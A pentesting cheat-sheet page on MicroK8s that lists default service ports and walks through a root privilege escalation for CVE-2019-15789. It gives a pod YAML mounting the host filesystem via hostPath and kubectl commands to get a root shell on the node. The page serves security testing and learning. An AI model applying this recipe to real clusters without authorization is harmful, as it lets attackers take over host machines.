MicroK8s Pentesting

Last modified: 2023-01-28

Container Privilege Escalation

MicroK8s is a small, fast, single-package Kubernetes for developers.

Ports and Services

Port 10250 - kubelet
Port 10255 - kubelet (read only)
Port 10257 - kube-controller
Port 10259 - kube-scheduler
Port 16443 - API server
Port 25000 - cluster-agent
Port 32000 - Docker registry

Docker Registry (port 32000)

It is the same as Docker Registry Pentesting .

Investigation from Inside

# Version
snap info microk8s

Privilege Escalation (CVE-2019-15789) ≤ 1.15.2

See the post for details.

1. Create a Pod Yaml File

Replace the value of spec.containers.image with the image which we found in target system.

apiVersion: v1
kind: Pod
metadata:
  name: hostmount
spec:
  containers:
  - name: shell
    image: ubuntu:latest
    command:
      - "bin/bash"
      - "-c"
      - "sleep 10000"
    volumeMounts:
      - name: root
        mountPath: /opt/root
  volumes:
  - name: root
    hostPath:
      path: /
      type: Directory

2. Apply the Yaml and Get a Root Shell

microk8s kubectl apply -f exploit.yaml
# "hostmount" is the value of the metadata.name in the exploit.yaml
microk8s kubectl exec -it hostmount /bin/bash

3. Explore Directories

After getting a shell, we can explore the directories under /opt/root which is mounted volume.

cd /opt/root

References

https://microk8s.io/docs/services-and-ports

Docker

Kubernetes

Others